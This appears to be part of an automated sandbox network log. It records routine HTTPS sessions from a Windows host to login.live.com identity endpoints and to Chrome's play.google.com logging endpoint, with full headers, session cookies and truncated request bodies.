                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      23 | 192.168.2.5 | 49837 | 40.126.29.15 | 443 | |
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      2024-04-19 01:29:51 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 4775
                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                      2024-04-19 01:29:51 UTC | 4775 | OUT
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                      2024-04-19 01:29:52 UTC | 568 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:52 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C555_SN1
                                                                                                                                                                                                                                      x-ms-request-id: c3d60b58-3d0a-43e6-ab90-93ac210fe044
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002F17E V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:52 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 1918
                                                                                                                                                                                                                                      2024-04-19 01:29:52 UTC | 1918 | IN
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      24 | 192.168.2.5 | 49838 | 40.126.29.15 | 443 | |
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      2024-04-19 01:29:51 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 4775
                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                      2024-04-19 01:29:51 UTC | 4775 | OUT
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                      2024-04-19 01:29:52 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:52 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C517_SN1
                                                                                                                                                                                                                                      x-ms-request-id: ac700725-a905-4e55-92e1-86c368a4b7a9
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002FA76 V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:52 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 11390
                                                                                                                                                                                                                                      2024-04-19 01:29:52 UTC | 11390 | IN
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      25 | 192.168.2.5 | 49840 | 40.126.29.15 | 443 | |
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      2024-04-19 01:29:52 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 4775
                                                                                                                                                                                                                                      Host: login.live.com
2024-04-19 01:29:52 UTC | 4775 | OUT
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-04-19 01:29:53 UTC | 568 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:52 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C555_SN1
                                                                                                                                                                                                                                      x-ms-request-id: fee88149-1372-4350-89be-7479dcb73c4c
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002F068 V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:52 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 1918
2024-04-19 01:29:53 UTC | 1918 | IN
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 49841 | 142.250.105.100 | 443 | 8152 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:52 UTC | 549 | OUT | OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                      Host: play.google.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Access-Control-Request-Method: POST
                                                                                                                                                                                                                                      Access-Control-Request-Headers: x-goog-authuser
                                                                                                                                                                                                                                      Origin: https://accounts.google.com
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
2024-04-19 01:29:53 UTC | 520 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                      Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Server: Playlog
                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 49842 | 142.250.105.100 | 443 | 8152 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:52 UTC | 549 | OUT | OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                      Host: play.google.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Access-Control-Request-Method: POST
                                                                                                                                                                                                                                      Access-Control-Request-Headers: x-goog-authuser
                                                                                                                                                                                                                                      Origin: https://accounts.google.com
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
2024-04-19 01:29:53 UTC | 520 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                      Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Server: Playlog
                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 49843 | 142.250.105.100 | 443 | 8152 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:53 UTC | 1321 | OUT | POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                      Host: play.google.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Content-Length: 521
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                      X-Goog-AuthUser: 0
                                                                                                                                                                                                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                      sec-ch-ua-model: ""
                                                                                                                                                                                                                                      sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Origin: https://accounts.google.com
                                                                                                                                                                                                                                      X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: NID=513=CSbWbIUIJiVwRCWJW5w0-llvTcpKQxKeTBtMAG_A1r-Ke11UnCSiWvmA-ZZmVuAtTjhQoR-cuqyxOr8EsQzZ6XgOuuWXHCB5ATA7X6Of_FmCezhFNF6eox60e888AEMMCicnVFjL5u4Cgdc2u3lwj6G8e7HQXFts4EWtSxLH0N8
2024-04-19 01:29:53 UTC | 521 | OUT | Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],1828,[["1713490192107",null,null,null
2024-04-19 01:29:53 UTC | 925 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                      Set-Cookie: NID=513=fIomzTyeeIx3JW2Kp7mYMo-5w2x2QyQwK-Zr3XFVGBOwe-0tzmvxLEKWb4VJJYGV9lSeFsVnLcnwNM2sSDc4iKRmYQD40QJgg511iODE8S_GWqHNVunbrx_ZbzUbvEV3AzfFuBZJcUe6nrZgQKeYbLlsy9HUbcOEF2z_rQwsKN4; expires=Sat, 19-Oct-2024 01:29:53 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Server: Playlog
                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
2024-04-19 01:29:53 UTC | 137 | IN | Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-04-19 01:29:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 49844 | 142.250.105.100 | 443 | 8152 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:53 UTC | 1321 | OUT | POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                      Host: play.google.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Content-Length: 521
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                      X-Goog-AuthUser: 0
                                                                                                                                                                                                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                      sec-ch-ua-model: ""
                                                                                                                                                                                                                                      sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Origin: https://accounts.google.com
                                                                                                                                                                                                                                      X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: NID=513=CSbWbIUIJiVwRCWJW5w0-llvTcpKQxKeTBtMAG_A1r-Ke11UnCSiWvmA-ZZmVuAtTjhQoR-cuqyxOr8EsQzZ6XgOuuWXHCB5ATA7X6Of_FmCezhFNF6eox60e888AEMMCicnVFjL5u4Cgdc2u3lwj6G8e7HQXFts4EWtSxLH0N8
2024-04-19 01:29:53 UTC | 521 | OUT | Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],1828,[["1713490192109",null,null,null
2024-04-19 01:29:53 UTC | 925 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                      Set-Cookie: NID=513=Wn_CXjX-2VcI2iEH6-uf7IUePLFc4zBcZ5vvY-BWgQvpNRI2f83XMZSN8I8vpr_zVSnn2kuylSlPWe9bMQ9F7_ZSYiXZB3ejeKgovAjDWcyn1Rq4N3Q7gs6ZYzU-MpFJmgiei_3kV_Pkj1gTb1dtpR074N1k4RWBiyHeYX0t3hs; expires=Sat, 19-Oct-2024 01:29:53 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Server: Playlog
                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
2024-04-19 01:29:53 UTC | 137 | IN | Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-04-19 01:29:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 49846 | 40.126.29.15 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:53 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 4775
                                                                                                                                                                                                                                      Host: login.live.com
2024-04-19 01:29:53 UTC | 4775 | OUT | Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-04-19 01:29:54 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:53 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C517_SN1
                                                                                                                                                                                                                                      x-ms-request-id: e220db18-2be6-4d91-a722-1a3edbd85db4
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002EFEE V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 11390
2024-04-19 01:29:54 UTC | 11390 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 49847 | 142.250.105.100 | 443 | 8152 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:54 UTC | 1299 | OUT | POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                      Host: play.google.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Content-Length: 1035
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                      X-Goog-AuthUser: 0
                                                                                                                                                                                                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                      sec-ch-ua-model: ""
                                                                                                                                                                                                                                      sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Origin: https://accounts.google.com
                                                                                                                                                                                                                                      X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
